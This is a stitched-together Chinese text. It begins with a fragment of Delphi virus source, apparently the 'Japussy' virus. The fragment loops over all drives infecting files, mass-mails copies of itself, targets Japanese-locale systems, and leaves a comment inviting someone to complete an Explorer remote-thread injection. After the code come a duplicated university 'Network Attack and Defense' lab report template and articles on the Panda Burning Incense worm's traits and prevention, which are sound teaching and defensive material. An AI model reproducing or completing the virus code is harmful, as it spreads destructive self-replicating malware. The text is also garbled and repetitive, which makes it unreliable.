doLoopFiles(Path + SubDir.Strings[i] + '', Mask);FreeAndNil(SubDir);end;{ 遍历磁盘上所有的文件}procedure InfectFiles;varDriverList: string;i, Len: Integer;beginif GetACP = 932 then //日文操作系统IsJap := True; //去死吧！DriverList := GetDrives; //得到可写的磁盘列表Len := Length(DriverList);while True do //死循环beginfor i := Len downto 1 do //遍历每个磁盘驱动器LoopFiles(DriverList[i] + ':', '*.*'); //感染之SendMail; //发带毒邮件Sleep(1000 * 60 * 5); //睡眠5分钟end;end;{ 主程序开始}beginif IsWin9x then //是Win9xRegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程else //WinNTbegin//远程线程映射到Explorer进程//哪位兄台愿意完成之？end;//如果是原始病毒体自己if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then InfectFiles //感染和发邮件else //已寄生于宿主程序上了，开始工作beginTmpFile := ParamStr(0); //创建临时文件Delete(TmpFile, Length(TmpFile) - 4, 4);TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件，多一个空格ExtractFile(TmpFile); //分离之FillStartupInfo(Si, SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,0, nil, '.', Si, Pi); //创建新进程运行之InfectFiles; //感染和发邮件end;end.。

《网络攻击与防御》实验报告计算机科学与技术学院计算机系网络教研室制实验报告撰写要求实验操作是教学过程中理论联系实际的重要环节，而实验报告的撰写又是知识系统化的吸收和升华过程，因此，实验报告应该体现完整性、规范性、正确性、有效性。

现将实验报告撰写的有关内容说明如下：1、实验报告模板为电子版。

2、下载统一的实验报告模板，学生自行完成撰写和打印。

报告的首页包含本次实验的一般信息：组号：例如：2-5 表示第二班第5组。

实验日期：例如：05-10-06 表示本次实验日期。

(年-月-日)……实验编号：例如：表示第一个实验。

实验时间：例如：2学时表示本次实验所用的时间。

实验报告正文部分，从六个方面（目的、内容、步骤等）反映本次实验的要点、要求以及完成过程等情况。

模板已为实验报告正文设定统一格式，学生只需在相应项内填充即可。

续页不再需要包含首页中的实验一般信息。

3、实验报告正文部分具体要求如下：一、实验目的本次实验所涉及并要求掌握的知识点。

二、实验环境实验所使用的设备名称及规格，网络管理工具简介、版本等。

三、实验内容与实验要求实验内容、原理分析及具体实验要求。

四、实验过程与分析根据具体实验，记录、整理相应命令、运行结果等，包括截图和文字说明。

详细记录在实验过程中发生的故障和问题，并进行故障分析，说明故障排除的过程及方法。

五、实验结果总结对实验结果进行分析，完成思考题目，总结实验的心得体会，并提出实验的改进意见。

1）掌握熊猫烧香病毒的工作原理和感染方法；2）掌握手工清除熊猫病毒的基本方法。

目标主机为windows-2003所用到的工具o Wsyschecko Filemon三、实验内容与实验要求蠕虫原理1）蠕虫定义2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。

这一病毒利用了微软视窗操作系统的漏洞，计算机感染这一病毒后，会不断自动拨号上网，并利用文件中的地址信息或者网络共享进行传播，最终破坏用户的大部分重要数据。

《网络攻击与防御》实验报告计算机科学与技术学院计算机系网络教研室制实验报告撰写要求实验操作是教学过程中理论联系实际的重要环节，而实验报告的撰写又是知识系统化的吸收和升华过程，因此，实验报告应该体现完整性、规范性、正确性、有效性。

现将实验报告撰写的有关内容说明如下：1、实验报告模板为电子版。

2、下载统一的实验报告模板，学生自行完成撰写和打印。

报告的首页包含本次实验的一般信息：组号：例如：2-5 表示第二班第5组。

实验日期：例如：05-10-06 表示本次实验日期。

(年-月-日)……实验编号：例如：表示第一个实验。

实验时间：例如：2学时表示本次实验所用的时间。

实验报告正文部分，从六个方面（目的、内容、步骤等）反映本次实验的要点、要求以及完成过程等情况。

模板已为实验报告正文设定统一格式，学生只需在相应项内填充即可。

续页不再需要包含首页中的实验一般信息。

3、实验报告正文部分具体要求如下：1）掌握熊猫烧香病毒的工作原理和感染方法；2）掌握手工清除熊猫病毒的基本方法。

目标主机为windows-2003所用到的工具o Wsyschecko Filemon三、实验内容与实验要求蠕虫原理1）蠕虫定义2007年1月流行的“熊猫烧香”以及其变种也是蠕虫病毒。

这一病毒利用了微软视窗操作系统的漏洞，计算机感染这一病毒后，会不断自动拨号上网，并利用文件中的地址信息或者网络共享进行传播，最终破坏用户的大部分重要数据。

蠕虫病毒是自包含的程序(或是一套程序)，它能传播它自身功能的拷贝或它的某些部分到其他的计算机系统中(通常是经过网络连接)。

请注意，与一般病毒不同，蠕虫不需要将其自身附着到宿主程序，有两种类型的蠕虫：主机蠕虫与网络蠕虫。

主计算机蠕虫完全包含在它们运行的计算机中，并且使用网络的连接仅将自身拷贝到其他的计算机中，主计算机蠕虫在将其自身的拷贝加入到另外的主机后，就会终止它自身(因此在任意给定的时刻，只有一个蠕虫的拷贝运行)，这种蠕虫有时也叫"野兔"。

前一段时间发现自己电脑里出现不少图标变成了一个熊猫烧香的图标，心里想看来是中毒的，上网查了一下，找到不少资料，大家分享！提高警惕！熊猫烧香是近期流传的一个相当厉害的病毒，属于威金的一个最新变种蠕虫病毒。

很多朋友中了以后用杀毒软件根本杀不死，只能忍痛割爱删除硬盘里所有的程序文件。

这个病毒严格的说是去年12月份开始流行的，按说杀毒软件应该已经升级解决了，但由于熊猫烧香的生命力惊人，经过这样长的一段时间仍然没有死绝。

问：什么是熊猫烧香病毒？答：“熊猫烧香”其实是一种蠕虫病毒的变种，而且是经过多次变种而来的。

尼姆亚变种W(Worm.Nimaya. w)，由于中毒电脑的可执行文件会出现“熊猫烧香”图案，所以也被称为“熊猫烧香”病毒。

用户电脑中毒后可能会出现蓝屏、频繁重启以及系统硬盘中数据文件被破坏等现象。

同时，该病毒的某些变种可以通过局域网进行传播，进而感染局域网内所有计算机系统，最终导致企业局域网瘫痪，无法正常使用。

病毒特征1、这个病毒关闭众多杀毒软件和安全工具2、循环遍历磁盘目录，感染文件，对关键系统文件跳过3、感染所有EXE、SCR、PIF、COM文件,并更改图标为烧香熊猫4、感染所有.htm/.html/.asp/.php/.jsp/.aspx文件，添加木马恶意代码5、自动删除*.gho文件如何预防“熊猫烧香”系列病毒“熊猫烧香”蠕虫不但可以对用户系统进行破坏，导致大量应用软件无法使用，而且还可删除扩展名为gh o的所有文件，造成用户的系统备份文件丢失，从而无法进行系统恢复；同时该病毒还能终止大量反病毒软件进程，大大降低用户系统的安全性。

这几天“熊猫烧香”的变种更是表象异常活跃，近半数的网民深受其害。

用户除了可以下载金山毒霸的“熊猫烧香”专杀来对付该病毒外，金山毒霸技术专家还总结的以下预防措施，帮你远离“熊猫烧香”病毒的骚扰。

1、立即检查本机administrator组成员口令，一定放弃简单口令甚至空口令，安全的口令是字母数字特殊字符的组合，自己记得住，别让病毒猜到就行。

熊猫烧香病毒样本引言熊猫烧香病毒（也称为Panda Burning Incense，简称Panda）是一种自2007年开始在中国传播的计算机病毒。

熊猫烧香病毒主要通过U盘传播，曾在全球范围内造成了大量的计算机破坏和数据丢失。

本文将探讨熊猫烧香病毒的样本特征及其影响。

病毒样本特征熊猫烧香病毒的样本特征包括以下几个方面：1. 文件扩展名熊猫烧香病毒的样本通常将感染的文件扩展名修改为.exe，以隐藏病毒的真实身份。

这样一来，用户在打开感染的文件时就会执行病毒的代码。

2. 病毒行为熊猫烧香病毒的样本会在感染时将自身复制到系统目录或其他常用目录下，并修改系统注册表以实现开机自启动。

同时，它会搜索用户U盘下的文件，并将自身复制到U盘的根目录和所有子目录中，以便在其他计算机上传播。

3. 源代码特征熊猫烧香病毒的样本通常通过反汇编分析发现它的源代码中包含了大量与计算机破坏行为相关的函数。

这些函数包括删除文件、格式化磁盘、修改系统配置等，可导致计算机系统崩溃或丢失重要数据。

熊猫烧香病毒的影响熊猫烧香病毒的传播速度非常快，曾在短时间内感染了大量的计算机系统。

它的传播方式主要是通过U盘，当感染的U盘插入其他计算机时，病毒就会复制到新的计算机中，并继续传播。

由于熊猫烧香病毒的源代码中包含了大量的破坏性函数，一旦感染计算机系统，就会对系统稳定性和数据安全造成极大威胁。

病毒可以删除关键系统文件，导致系统无法正常启动；它还可以格式化磁盘，使用户的数据永久丢失。

因此，熊猫烧香病毒对个人和组织的计算机系统造成了重大影响。

预防和应对策略针对熊猫烧香病毒的传播和影响，以下是一些预防和应对策略：1.更新杀毒软件：定期更新杀毒软件，以保持对新型病毒的识别和防御能力。

2.谨慎使用U盘：避免使用未知来源的U盘，并定期对U盘进行杀毒扫描。

3.远离非法下载：避免下载非法软件和盗版资源，以减少感染病毒的风险。

4.定期备份数据：定期备份重要数据，以防止数据丢失。